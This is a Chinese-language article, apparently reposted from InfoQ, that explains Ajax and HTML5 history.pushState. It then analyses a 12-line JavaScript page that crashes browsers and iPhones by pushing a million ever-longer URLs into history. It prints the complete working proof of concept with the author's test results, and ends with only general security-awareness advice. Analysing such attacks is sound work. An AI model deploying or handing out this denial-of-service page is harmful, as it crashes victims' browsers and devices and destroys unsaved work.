js中的“十二行詩” ----12行JS代碼的DoS攻擊分析及其防禦

有一段12行的JavaScript代碼，可以讓Firefox、Chrome、Safari瀏覽器崩潰，而且還能讓iPhone重啓、安卓閃退，本文作者對這12行代碼進行了分析解讀並且提出了相應的防禦辦法，歡迎大家一同探討。

Ajax與pjax

Ajax即“Asynchronous Javascript And XML”（異步JavaScript和XML），是一種用於創建快速動態網頁的技術。通過在後臺與服務器進行少量數據交換，Ajax可以使網頁實現異步更新。這意味着可以在不重新加載整個網頁的情況下，對網頁的某部分進行更新無刷新操作。

但是，Ajax應用也會造成另外的問題，容易導致瀏覽器無法前進與後退，這是個很頭疼的問題，開發人員必須增加工作量(比如通過一個隱藏的iframe，或者改變location.hash值等方法)來解決。

爲了解決傳統Ajax帶來的問題，HTML5裏引入了新的API：history.pushState，它和Ajax結合後，有個新的稱呼是pjax。是一種基於Ajax+history.pushState的新技術，該技術可以無刷新改變頁面的內容，並且可以改變頁面的URL。pjax是Ajax+pushState的封裝，同時支持本地存儲、動畫等多種功能。目前支持jquery、qwrap、kissy等多種版本。

HTML5.history.pushState

HTML5可以通過pushState和replaceState接口操作瀏覽器歷史，並且改變當前頁面的URL。

pushState是將指定的URL添加到瀏覽器歷史裏，存儲當前歷史記錄點。replaceState是將指定的URL替換當前的URL。同時，這些方法會和window.onpostate事件一起工作。

history.pushState(data, title, url)：往歷史記錄堆棧頂部添加一條記錄；data會在onpopstate事件觸發時作爲參數傳遞過去；title爲頁面標題，當前所有瀏覽器一般都會 忽略此參數；URL爲頁面地址，可選，缺省爲當前頁地址。具體細節：

state：對象是一個JavaScript狀態對象，記錄歷史記錄點的額外對象，可以爲空。它關係到由pushState()方法創建出來的新的history實體。用以存儲關於你所要插入到歷史記錄的條目的相關信息。

title：所有瀏覽器一般都會 忽略此參數，雖然它可能將來會被使用上。而現在最安全的使用方式是傳一個空字符串，以防止將來的修改，或者可以傳一個簡短的標題來表示state。

URL：這個參數用來傳遞新的history實體的URL，新的URL必須和現有的URL同域，否則pushState()將拋出異常。這個參數是選填的，如果爲空，則會被置爲document當前的URL。

十二行代碼分析

<html>
<body>
<script>
var total="";
for (var i=0;i<1000000;i++)
{    total= total+i.toString();    history.pushState(0,0,total);
}
</script>
</body>
</html>

上面就是十二行代碼，關鍵點在於針對total這個URL的循環：history.pushState(0,0,total)；不停的在修改URL，循環了1,000,000次，不停的向歷史記錄堆棧中新增記錄，會導致CPU和內存佔用率過高以及Firefox，Chrome，Safari瀏覽器崩潰，而且還能讓iPhone重啓。

分析結果

在XP虛擬機(i7單核3.4G、512內存) 親自實測：

• 當上面那個循環次數爲十萬以上級別的時候，CPU，內存使用率瞬間100%，然後崩潰死機；

• 當上面那個循環次數縮小到10000左右的時候，CPU，內存使用率大概在20秒內逐漸升高至100%，然後崩潰死機；

• 當上面那個循環次數縮小到500左右的時候， CPU使用率逐漸升高到達100%後，再次瞬間恢復到穩定狀態，內存使用從130M左右升高至230M左右，而打開的192.168.56.106/12.html這個頁面後，地址欄裏面的鏈接也變成了：192.168.56.106/0123456789101112131415161718192021……494495496497498499

可見，通過循環不停的向向歷史記錄堆棧中新增記錄的同時，頁面會刷新到跳轉的新地址，就是循環累加的一個“僞地址”，當這個長度超限的時候，就會引起DOS了，攻擊的效果和效率完全取決於循環的次數和目標的硬件配置。

相關的防禦

相信大家的安全意識已經非常的強悍了，但是還是要警鐘長鳴，不要輕信任何陌生人通過任何方式發給你的鏈接、附件、郵件、圖片等任何信息，當然不排除好基友們、損友們的惡作劇了，所以小夥伴兒們記得經常Ctrl+S哦，否則被搞死機了也會很鬱悶的。

互聯網自誕生之日起，就暴露在黑客攻擊之下，早期的黑客攻擊多少還帶有技術試驗和炫耀的目的，但隨着全球互聯網基礎設施規模的壯大、連接的無限增長和用戶數的急劇膨脹，黑客攻擊頻率也相應增加，黑客技術也在不斷的發展，逐漸出現了以非法獲取經濟利益爲目的的黑色產業鏈。針對互聯網安全防護的技術水平更是突飛猛進，道高一尺魔高一丈，攻與防，在這個互聯網時代每分每秒都正在發生着。

當然，互聯網充滿着信息安全威脅，網絡安全防護，七分靠技術，三分靠意識，要防護這些問題，單純依靠安全廠商的產品和服務是遠遠不夠的，網絡安全意識的提高不可忽視。

比如：注意個人密碼的管理、注意個人隱私的保護、不要輕易接入公共的wifi、不要輕易相信陌生/熟悉朋友的鏈接或者文件等、注意移動支付的安全、不要讓設備“裸奔”等等。

注：本文出處摘自 微信InfoQ，僅供盆友們學習和娛樂